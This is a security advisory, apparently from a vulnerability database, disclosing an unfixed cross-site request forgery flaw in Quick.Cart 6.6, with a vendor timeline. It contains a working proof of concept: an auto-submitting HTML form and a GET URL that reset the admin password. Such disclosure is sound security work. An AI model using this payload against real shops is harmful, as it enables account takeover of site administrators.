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Quick.Cart 6.6 Cross Site Request Forgery

🗓️ 08 Nov 2015 00:00:00Reported by Tim CoenType 
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Quick.Cart 6.6 CSRF vulnerability not fixed; attack via crafted HTML/JavaScript, admin file renaming suggeste

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`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: Quick.Cart 6.6  
Fixed in: not fixed  
Fixed Version Link: n/a  
Vendor Contact: [email protected]  
Vulnerability Type: CSRF  
Remote Exploitable: Yes  
Reported to vendor: 09/07/2015  
Disclosed to public: 10/07/2015  
Release mode: Full Disclosure  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Description  
  
None of the requests of Quick.Cart 6.6 are protected from CSRF. This means that  
an attacker can perform actions for a logged in user by getting them to visit a  
website with specifically crafted HTML and JavaScript while logged in.  
  
The interesting Forms are all in the admin.php file. To add security through  
obscurity, Quick.Cart does suggest to rename this file, which would make it  
more difficult to exploit these vulnerabilities. The renaming is not mandatory.  
  
The vulnerability can be exploited via GET or POST because of a call to  
extract: extract( $_GET );  
  
3. Proof of Concept  
  
Change Admin Password:  
  
  
<html>  
<body>  
<form id="myform" action="http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config" method="POST">  
<input type="hidden" name="sOption" value="save �»" />  
<input type="hidden" name="login" value="admin" />  
<input type="hidden" name="pass" value="admin" />  
<input type="submit" value="Submit request" />  
</form>  
<script>document.createElement('form').submit.call(document.getElementById('myform'));</script>  
</body>  
</html>  
  
Or via GET:  
  
  
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config&_POST[sOption]=save%20%26raquo%3B&_POST[login]=admin&_POST[pass]=123&_POST[submit]=Submit%20request  
  
4. Solution  
  
This issue was not fixed by the vendor.  
  
5. Report Timeline  
  
09/07/2015 Informed Vendor about Issue  
10/01/2015 Reminded Vendor of release date  
10/01/2015 Vendor does not plan on releasing a fix, because the optional rename of the admin file may mitigate this issue already  
10/07/2015 Disclosed to public  
  
Blog Reference:  
http://blog.curesec.com/article/blog/QuickCart-66-CSRF-73.html  
`

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08 Nov 2015 00:00Current
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